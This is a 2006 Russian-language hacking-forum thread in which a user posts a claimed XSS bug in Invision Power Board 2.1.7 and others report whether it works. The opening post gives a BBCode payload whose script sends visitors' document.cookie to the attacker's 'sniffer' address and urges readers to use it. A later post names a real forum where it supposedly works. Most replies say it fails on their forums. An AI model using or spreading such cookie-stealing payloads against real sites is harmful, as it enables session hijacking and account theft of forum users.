Форумы Ура! Я вродь нашёл баг в Ipb 2.1.7

Discussion in 'Уязвимости CMS/форумов' started by ~Real F@ck!~, 6 Oct 2006.

  1. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Короче роюсь я роюсь в своём форуме и нашёл баг-
    Code:
    [warn][img]j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg[/img][/warn]
    Если у кого он сработает и если я кому помог тогда жду +++ ! =) :D

    И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи!

    ==================

    ==================
     
    #1 ~Real F@ck!~, 6 Oct 2006
    Last edited by a moderator: 8 Oct 2006
    2 people like this.
  2. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    "Динамические страницы в тэгах запрещены"

    Боюсь такой же ответ ждет на большинстве форумов.
     
  3. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    угу
     
  4. Twiddle

    Twiddle Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    13
    Likes Received:
    9
    Reputations:
    0
    Неа, не катит... А жаль.. =(
     
  5. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    покажи конкретный 2.1.7 где ты это нашел. т.к. это бред..
     
  6. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    blackybr forum.angelz.ru ток чур неломать а то мне капут!
     
    1 person likes this.
  7. WEB'er

    WEB'er Member

    Joined:
    26 Jun 2006
    Messages:
    15
    Likes Received:
    5
    Reputations:
    0
    Эта бага зависит от настроек форума, я так думаю. И очень мало форумов удасться сломать :(
     
  8. Bayazid

    Bayazid Banned

    Joined:
    26 Nov 2005
    Messages:
    141
    Likes Received:
    24
    Reputations:
    -2
    У меня не сработала...(
     
  9. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Наврядли у кого будет это работать. Почти ва всех форумах запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело!
    За старание можно поставить +)
     
  10. -Concord-

    -Concord- Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    158
    Likes Received:
    191
    Reputations:
    68
    Всё просто, но не везде идёт. я этим давно пользовался.
     
  11. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Ребят я ж попросил что на forum.angelz.ru ненадо нечего делать! Блин ну даш для примера один форум потом расхлёбывай! (=
     
    1 person likes this.
  12. Twiddle

    Twiddle Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    13
    Likes Received:
    9
    Reputations:
    0
    Ты же там админ - заткни багу и все... ЗЫ: я не ломал.. ;)
    Лови + за старания и смелость.. ;)
     
  13. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Twiddle я там неадмин, я там супермодер, т.к. имею доступ к админке, ща попробую!
     
  14. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    Есть еще Xss тока это надо иметь как минимум Модера.:)
     
  15. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    _-[A.M.D]HiM@S-_
    А поконкретней? Не слыхал ни разу.
     
  16. BMaster

    BMaster Elder - Старейшина

    Joined:
    12 Jan 2006
    Messages:
    32
    Likes Received:
    34
    Reputations:
    7
    а на чо теги [warn] заменить?
     
  17. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Не на что их не менять. Там просто тэг [​IMG]
     
  18. BMaster

    BMaster Elder - Старейшина

    Joined:
    12 Jan 2006
    Messages:
    32
    Likes Received:
    34
    Reputations:
    7
    У меня не работает, вставляю блок с кодом, в посте появляется надпись:
    [warn][/warn]
    И это обычным текстом, не ссылкой.
     
  19. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Блин что за вопросы... ща объясню-
    [warn][/warn]- тег предупреждения
    - тег картинки
    Вся проблема в том что по стандарту в динамических страницах тег запрещены, вот поэтому работает ненавсех форумах. И ещё к примеру место тега [warn][/warn] мона подставить тег [info][/info]
     
  20. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Помойму это активная XSS... =/